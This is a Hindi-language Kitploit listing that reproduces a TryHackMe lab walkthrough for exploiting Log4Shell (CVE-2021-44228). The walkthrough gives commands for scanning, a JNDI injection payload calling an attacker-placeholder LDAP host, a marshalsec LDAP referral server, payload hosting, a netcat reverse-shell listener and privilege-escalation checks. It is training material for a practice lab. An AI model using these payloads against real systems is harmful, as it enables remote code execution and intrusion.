Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
solar-exploiting-log4j — यह रिपॉजिटरी TryHackMe पर *Solar Exploiting Log4j रूम* का विस्तृत वॉकथ्रू प्रदान करती है, जो गंभीर Log4Shell भेद्यता (CVE-2021-44228) के शोषण पर केंद्रित है। यह प्रोजेक्ट दर्शाता है कि कैसे हमलावर Java अनुप्रयोगों में असुरक्षित लॉगिंग तंत्र का लाभ उठाकर रिमोट कोड निष्पादन प्राप्त कर सकते हैं। | Kitploit
उपकरण/GitHubGitHub/lavanya2085/solar-exploiting-log4j
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणCTFपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षालैब और अभ्यास
GitHublavanya2085/solar-exploiting-log4j

solar-exploiting-log4j

रिपॉजिटरी देखें
135 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →

विवरण

यह रिपॉजिटरी TryHackMe पर *Solar Exploiting Log4j रूम* का विस्तृत वॉकथ्रू प्रदान करती है, जो गंभीर Log4Shell भेद्यता (CVE-2021-44228) के शोषण पर केंद्रित है। यह प्रोजेक्ट दर्शाता है कि कैसे हमलावर Java अनुप्रयोगों में असुरक्षित लॉगिंग तंत्र का लाभ उठाकर रिमोट कोड निष्पादन प्राप्त कर सकते हैं।

साझा करें

🔥 Solar Exploiting Log4j - TryHackMe वॉकथ्रू

📌 रूम: Solar Exploiting Log4j

प्लेटफ़ॉर्म: TryHackMe
कठिनाई: मध्यम
विषय: Log4Shell (Log4j भेद्यता)


🧠 उद्देश्य

Log4j भेद्यता (CVE-2021-44228) का शोषण करके रिमोट कोड निष्पादन प्राप्त करें और फ़्लैग कैप्चर करें।


🛠️ उपयोग किए गए उपकरण

  • Nmap
  • Burp Suite
  • cURL
  • Netcat
  • Python HTTP Server

🌐 चरण 1: रिकॉनिसेंस

🔍 लक्ष्य स्कैन करें

root@kitploit:~
nmap -sC -sV <TARGET_IP>

📌 निष्कर्ष

  • खुले पोर्ट: 80 (HTTP), अन्य रूम पर निर्भर
  • वेब एप्लिकेशन Java-आधारित बैकएंड पर चल रहा है

  • 🌐 चरण 2: वेब एन्यूमरेशन

    • ब्राउज़र में वेब ऐप पर जाएँ
    • इनपुट्स के साथ इंटरैक्ट करें (लॉगिन/खोज/हेडर फ़ील्ड)
    • Burp Suite का उपयोग करके रिक्वेस्ट कैप्चर करें

    💥 चरण 3: Log4j भेद्यता की पहचान करें

    Log4j भेद्यता JNDI इंजेक्शन की अनुमति देती है:

    root@kitploit:~
    ${jndi:ldap://<ATTACKER_IP>:1389/a}
    

    यदि इनपुट लॉग किया जाता है → भेद्यता मौजूद है।


    ⚙️ चरण 4: लिसनर सेट करें

    Netcat प्रारंभ करें

    root@kitploit:~
    nc -lvnp 4444
    

    दुर्भावनापूर्ण LDAP सर्वर प्रारंभ करें (उदाहरण)

    root@kitploit:~
    git clone https://github.com/mbechler/marshalsec
    cd marshalsec
    mvn clean package
    

    LDAP सर्वर चलाएँ:

    root@kitploit:~
    java -cp target/marshalsec.jar marshalsec.jndi.LDAPRefServer "http://<ATTACKER_IP>:8000/#Exploit" 1389
    

    📡 चरण 5: पेलोड होस्ट करें

    root@kitploit:~
    python3 -m http.server 8000
    

    दुर्भावनापूर्ण Java क्लास बनाएँ (Exploit.class)


    🚀 चरण 6: एक्सप्लॉइट ट्रिगर करें

    पेलोड को असुरक्षित फ़ील्ड में इंजेक्ट करें:

    root@kitploit:~
    ${jndi:ldap://<ATTACKER_IP>:1389/Exploit}
    

    💡 इस तरह के हेडर का उपयोग करें:

    • User-Agent
    • X-Api-Version

    🖥️ चरण 7: रिवर्स शेल प्राप्त करें

    एक बार ट्रिगर होने पर:

    • लक्ष्य Netcat लिसनर पर वापस कनेक्ट करता है
    • आपको शेल एक्सेस मिल जाता है

    🔐 चरण 8: प्रिविलेज एस्केलेशन (यदि आवश्यक हो)

    जाँचें:

    root@kitploit:~
    sudo -l
    

    इनकी तलाश करें:

    • गलत कॉन्फ़िगर किए गए SUID बाइनरी
    • लिखने योग्य फ़ाइलें
    • क्रॉन जॉब्स

    🚩 चरण 9: फ़्लैग कैप्चर करें

    root@kitploit:~
    find / -name flag.txt 2>/dev/null
    cat flag.txt
    

    🧾 सीखी गई मुख्य अवधारणाएँ

    • Log4Shell (CVE-2021-44228)
    • JNDI इंजेक्शन
    • रिमोट कोड निष्पादन (RCE)
    • रिवर्स शेल
    • वेब शोषण

    टूल डाउनलोड करें